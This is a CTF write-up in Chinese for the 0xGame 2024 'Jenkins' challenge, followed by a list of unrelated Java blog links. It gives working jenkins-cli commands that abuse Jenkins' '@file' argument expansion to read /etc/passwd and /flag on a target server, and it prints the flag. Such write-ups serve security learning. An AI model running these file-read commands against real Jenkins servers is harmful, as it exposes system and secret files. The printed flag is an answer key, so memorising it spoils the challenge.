0xGame 2024 [Week 4] Jenkins

1.前言

由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。

2.题目

这个给的提示对于小白来说实在是友好的过劲。

3.分析

上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考

https://blog.csdn.net/2301_80127209/article/details/139777834https://blog.csdn.net/2301_80127209/article/details/139777834

打开页面

利用框架漏洞 ,路径后进行添加 /jnlpJars/jenkins-cli.jar,下载下来文件

进行读取文件 ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"

成功实现任意文件读取功能 ,但只是显示了一部分

尝试目标是否开启了"匿名用户可读"选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"

这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"

成功获取到flag

4.答案

0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}
相关推荐
Yaml41 小时前
Spring Boot 与 Vue 共筑二手书籍交易卓越平台
java·spring boot·后端·mysql·spring·vue·二手书籍
小小小妮子~1 小时前
Spring Boot详解:从入门到精通
java·spring boot·后端
hong1616881 小时前
Spring Boot中实现多数据源连接和切换的方案
java·spring boot·后端
aloha_7891 小时前
从零记录搭建一个干净的mybatis环境
java·笔记·spring·spring cloud·maven·mybatis·springboot
记录成长java2 小时前
ServletContext,Cookie,HttpSession的使用
java·开发语言·servlet
睡觉谁叫~~~2 小时前
一文解秘Rust如何与Java互操作
java·开发语言·后端·rust
程序媛小果2 小时前
基于java+SpringBoot+Vue的旅游管理系统设计与实现
java·vue.js·spring boot
小屁孩大帅-杨一凡3 小时前
java后端请求想接收多个对象入参的数据
java·开发语言
java1234_小锋3 小时前
使用 RabbitMQ 有什么好处?
java·开发语言
TangKenny3 小时前
计算网络信号
java·算法·华为